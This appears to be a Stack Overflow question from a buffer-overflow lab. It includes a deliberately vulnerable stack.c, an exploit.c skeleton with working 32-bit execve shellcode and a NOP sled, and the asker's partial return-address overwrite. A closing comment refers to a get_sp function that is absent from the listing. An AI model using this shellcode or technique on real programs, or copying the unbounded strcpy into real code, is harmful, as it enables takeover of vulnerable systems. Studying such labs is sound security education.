
I am writing exploit.c for my buffer overflow program and am stuck on how to obtain the return address. The code below is my strategy, where `ret` would be the address that overwrites the saved return address of `bof`.

How do I get this return address from the gdb? (Base code is at the end.)

My strategy was to set a breakpoint at the `bof` function in stack.c, run the program under gdb, and use the "saved eip" value reported there (the address `bof` normally returns to in `main`) as the return address.

/* NOTE(review): this assumes the saved return address sits exactly 24 bytes
 * past buffer[0], i.e. immediately after the 24-byte array in bof(). In a real
 * frame the compiler places the saved ebp (and possibly alignment padding)
 * between the array and the return address, so the offset must be read from
 * the frame in gdb rather than taken from sizeof(buffer). Also, sizeof(long)
 * is 4 on 32-bit x86 but 8 on x86-64; the shellcode in exploit.c uses
 * int 0x80, so this only makes sense for a 32-bit build. */
long* ptr = (long*)(buffer + 24);
 ret = 0x-------;  /* placeholder, not valid C: must be the concrete address to jump to */
*ptr = ret;
 /* NOTE(review): strcpy() also writes the terminating NUL. Starting at
  * 517 - strlen(shellcode) puts that NUL at buffer[517], one byte past the
  * 517-byte array declared in exploit.c. memcpy(..., strlen(shellcode))
  * copies only the payload bytes and avoids the off-by-one. */
 strcpy(buffer + 517 - strlen(shellcode), shellcode);

Shouldn't this piece of code do the job on its own? Why do I need to fill any other part of the buffer array with other information (such as the 0x90 NOP bytes that exploit.c writes with memset)?


Base code:

/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/* Copies the caller-supplied string into a fixed 24-byte stack buffer
 * with strcpy(), which enforces no length bound: any str longer than
 * 23 bytes plus its NUL writes past buffer into whatever the compiler
 * placed above it in the frame (saved registers, saved ebp, the return
 * address). This is the deliberate vulnerability of the lab.
 *
 * @param str  NUL-terminated input; only strings of at most 23 bytes
 *             fit in buffer.
 * @return     always 1.
 */
int bof(char *str)
{
    char buffer[24];
    /* The following statement has a buffer overflow problem */
    /* strcpy() stops only at the first NUL in str. The distance from
     * buffer[0] to the saved return address is chosen by the compiler
     * (alignment, saved ebp, optimisation level), so it is not simply
     * 24 bytes; read it from the frame in gdb rather than assuming it. */
    strcpy(buffer, str);
    return 1;
}
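/* Reads up to 517 bytes from "badfile" in the current directory and
 * hands them to bof(), which copies them into a 24-byte buffer.
 *
 * The 517-byte case is intentionally left exactly as in the lab: str is
 * exactly 517 bytes and fread() writes no terminator, so a full-size
 * badfile leaves strcpy() in bof() scanning past the end of str for a
 * NUL. What this version adds is failing visibly when badfile cannot be
 * opened (the original passed a NULL FILE* to fread()), closing the
 * file, and NUL-terminating short reads so a small badfile does not
 * make strcpy() read uninitialised stack bytes.
 *
 * @return 1 after bof() returns (kept for compatibility with the lab),
 *         EXIT_FAILURE if badfile cannot be opened or is empty.
 */
int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;
    size_t nread;

    (void)argc;
    (void)argv;

    badfile = fopen("badfile", "r");
    if (badfile == NULL) {
        perror("fopen badfile");
        return EXIT_FAILURE;
    }
    nread = fread(str, sizeof(char), 517, badfile);
    fclose(badfile);
    if (nread == 0) {
        fprintf(stderr, "badfile is empty or unreadable\n");
        return EXIT_FAILURE;
    }
    /* A short file gets a terminator; a full 517-byte file is passed
     * through unchanged, exactly as the original program did. */
    if (nread < sizeof str) {
        str[nread] = '\0';
    }
    bof(str);
    printf("Returned Properly\n");
    return 1;
}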

/* exploit.c  */

/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/* x86 (32-bit) Linux shellcode: builds the string "/bin//sh" on the stack
 * and calls execve(2) through int 0x80 with eax = 11 (0x0b):
 *   ebx -> "/bin//sh"     pathname; "//sh" pads it to 8 bytes so the two
 *                         4-byte pushes need no embedded NUL, and the
 *                         earlier pushl %eax (eax == 0) terminates it
 *   ecx -> { ebx, NULL }  argv
 *   edx  = 0              envp; cdq sign-extends eax == 0 into edx
 * The encoding contains no 0x00 byte, so strcpy() in the target copies
 * it whole. It is 32-bit only (int 0x80, 32-bit registers); the target
 * must be a 32-bit executable (e.g. built with -m32). The NUL that the
 * C string literal appends is not part of the payload: strlen(shellcode)
 * excludes it. */
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdq                            */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

/* Writes the 517-byte payload to ./badfile.
 * NOTE(review): `void main` is non-standard C; `int main` is the portable
 * form. The listing is truncated here (no closing brace), and badfile is
 * never fclose()d, so the fwrite() below may stay buffered if the process
 * ends abnormally. fopen() is also not checked for NULL. */
void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    /* Filling the whole array with NOPs (rather than only the slot that
     * holds the return address) is the usual reason for this step: a
     * return address that lands anywhere in the run of 0x90 bytes executes
     * forward into the shellcode placed after them, so the exact stack
     * address does not have to be guessed precisely. &buffer and buffer
     * denote the same address here. */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */ 

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");  /* unchecked: fwrite() on a NULL FILE* is undefined behaviour */
    fwrite(buffer, 517, 1, badfile);
  • The get_sp function does nothing meaningful because the author did not understand inline asm. It copies the stack pointer to the eax register, but then does nothing with it, assuming (invalidly) that it will still be there when the function returns. The correct form would be unsigned ret; __asm__("mov %%esp,%0" : "=r"(ret)); return ret; Commented Oct 10, 2018 at 4:35
    Possible duplicate of Buffer Overflow Vulnerability Lab problems Commented Apr 11, 2019 at 9:26

